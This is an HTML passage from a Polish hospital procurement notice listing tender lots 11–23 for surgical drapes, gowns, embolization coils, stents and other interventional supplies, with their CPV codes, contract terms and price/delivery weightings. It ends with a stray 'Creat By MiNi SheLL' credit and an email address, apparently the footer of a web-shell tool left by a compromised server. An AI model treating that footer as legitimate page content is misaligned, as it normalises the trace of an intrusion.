</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> obłożenia chirurgiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> obłożenia chirurgiczne w 4 pozycjach asortymentowych
Szczegółowy opis,  zakres i wielkość przedmiotu zamówienia został zawarty w formularzu przedmiotu zamówienia, cenowym stanowiącym załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> fartuchy chirurgiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> fartuchy chirurgiczne  w 2 pozycjach asortymentowych
Szczegółowy opis,  zakres i wielkość przedmiotu zamówienia został zawarty w formularzu przedmiotu zamówienia, cenowym stanowiącym załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. termin wykonania-dostawy - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> coile do embolizacji naczyniowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> coile do embolizacji naczyniowych  w 1 pozycji asortymentowej
Szczegółowy opis,  zakres i wielkość przedmiotu zamówienia został zawarty w formularzu przedmiotu zamówienia, cenowym stanowiącym załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. termin wykonania-dostawy - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> stent szyjny samorozprężalny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> stent szyjny samorozprężalny  w 2 pozycjach asortymentowych
Szczegółowy opis,  zakres i wielkość przedmiotu zamówienia został zawarty w formularzu przedmiotu zamówienia, cenowym stanowiącym załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. termin wykonania-dostawy - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> system rotacyjny do trombectomii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> system rotacyjny do trombectomii  w 1 pozycji asortymentowej
Szczegółowy opis,  zakres i wielkość przedmiotu zamówienia został zawarty w formularzu przedmiotu zamówienia, cenowym stanowiącym załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. termin wykonania-dostawy - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> system neuroprotekcji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> system neuroprotekcji  w 1 pozycji asortymentowej
Szczegółowy opis,  zakres i wielkość przedmiotu zamówienia został zawarty w formularzu przedmiotu zamówienia, cenowym stanowiącym załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. termin wykonania-dostawy - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Y-connector.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Y-connector  w 1 pozycji asortymentowej
Szczegółowy opis,  zakres i wielkość przedmiotu zamówienia został zawarty w formularzu przedmiotu zamówienia, cenowym stanowiącym załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. termin wykonania-dostawy - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> system re-entry.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> system re-entry  w 2 pozycjach asortymentowych
Szczegółowy opis,  zakres i wielkość przedmiotu zamówienia został zawarty w formularzu przedmiotu zamówienia, cenowym stanowiącym załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. termin wykonania-dostawy - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> partykuły do chemoembolizacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> partykuły do chemoembolizacji  w 2 pozycjach asortymentowych
Szczegółowy opis,  zakres i wielkość przedmiotu zamówienia został zawarty w formularzu przedmiotu zamówienia, cenowym stanowiącym załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. termin wykonania-dostawy - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> cząstki embolizacyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> cząstki embolizacyjne  w 1 pozycji asortymentowej
Szczegółowy opis,  zakres i wielkość przedmiotu zamówienia został zawarty w formularzu przedmiotu zamówienia, cenowym stanowiącym załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. termin wykonania-dostawy - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> stent kardiologiczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> stent kardiologiczny  w 1 pozycji asortymentowej
Szczegółowy opis,  zakres i wielkość przedmiotu zamówienia został zawarty w formularzu przedmiotu zamówienia, cenowym stanowiącym załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. termin wykonania-dostawy - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> korek naczyniowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> korek naczyniowy  w 1 pozycji asortymentowej
Szczegółowy opis,  zakres i wielkość przedmiotu zamówienia został zawarty w formularzu przedmiotu zamówienia, cenowym stanowiącym załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. termin wykonania-dostawy - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> resektoskop - elementy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> resektoskop - elementy  w 7 pozycjach asortymentowych
Szczegółowy opis,  zakres i wielkość przedmiotu zamówienia został zawarty w formularzu przedmiotu zamówienia, cenowym stanowiącym załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. termin wykonania-dostawy - 3</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com